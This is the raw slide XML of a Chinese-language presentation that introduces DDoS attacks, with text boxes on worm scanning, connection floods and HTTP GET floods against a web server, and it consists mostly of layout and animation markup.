              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="华文中宋" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>蠕虫则表现为大范围扫描行为</a:t>
            </a:r>
          </a:p>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ea typeface="华文中宋" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> 消耗骨干设备的资源</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="华文中宋" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>如防火墙的连接数</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="195606" name="Text Box 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C1D7ED4-179E-4E97-8232-CE26B104D0D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="539750" y="1108075"/>
            <a:ext cx="2960688" cy="30797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Connection Flood </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>攻击原理</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1400">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Franklin Gothic Book" panose="020B05030201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440"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="184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18446"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="18446"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="18446"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="18446"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="18446"/>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18455"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="18455"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="18455"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="18455"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="18455"/>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8" fill="hold" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="18458"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="18458"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="29" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="18458"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="30" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="18458"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="31" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="18458"/>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18461"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="36" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="18461"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="37" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="18461"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="38" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="18461"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="39" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="18461"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>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17" presetClass="entr" presetSubtype="8" fill="hold" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="43" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="18464"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="44" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="18464"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="45" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="18464"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="46" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="18464"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="47" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="18464"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>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8441"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="52" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1844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18444"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="57" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="18444"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="58" fill="hold" nodeType="afterGroup">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="59" presetID="2" presetClass="entr" presetSubtype="8" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="60" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="18453"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="61" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="18453"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="62" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="184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bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="18444" grpId="0" bldLvl="0" autoUpdateAnimBg="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97634" name="Group 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3057D4A-9239-41AF-8326-F5F5AD8BDF81}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="468313" y="1268413"/>
            <a:ext cx="1368425" cy="1487487"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1296" cy="2056"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="197679" name="Picture 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6FE6DE67-323C-4221-B736-C76407E88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96" cy="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80" name="Text Box 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5401584D-092D-4F81-8ED5-C03BA5091C19}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="240" y="1631"/>
              <a:ext cx="767"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攻击者</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="197635" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66034EDF-A770-4A21-9CFB-8159BA760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900" y="1476375"/>
            <a:ext cx="136842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6" name="Text Box 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB074FED-91CE-4F7D-924A-52A1A91FA547}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4025900" y="2874963"/>
            <a:ext cx="17335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受害者</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Franklin Gothic Book" panose="020B0503020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(Web Server)</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20487" name="Text Box 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20F47190-7B1E-49D6-9BAC-24577331C1A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2051050" y="1125538"/>
            <a:ext cx="20907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500">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>正常HTTP Get请求</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1500">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Franklin Gothic Book" panose="020B0503020102020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20488" name="Text Box 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{773B072B-0A64-4323-A20E-942E9C79A1FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-1275029">
            <a:off x="1822450" y="3763963"/>
            <a:ext cx="21605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不能建立正常的连接</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="197639" name="Rectangle 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2C29D14-B246-4522-A0C7-24C1F39D8A69}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="315913" y="174625"/>
            <a:ext cx="7861300" cy="503238"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>DDoS攻击介绍——HTTP Get Flood</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="197640" name="Picture 13" descr="j0301260">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6469A41-402A-411E-A4D3-8BFAC0B9A87E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3571875"/>
            <a:ext cx="1238250" cy="1065213"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="197641" name="Group 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{048BB415-93F0-4936-969E-C0F69E023BA9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1917700" y="1425575"/>
            <a:ext cx="2303463" cy="504825"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1572" cy="318"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="197677" name="AutoShape 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E17FFD8-A9FC-4602-A587-74C51871A17C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
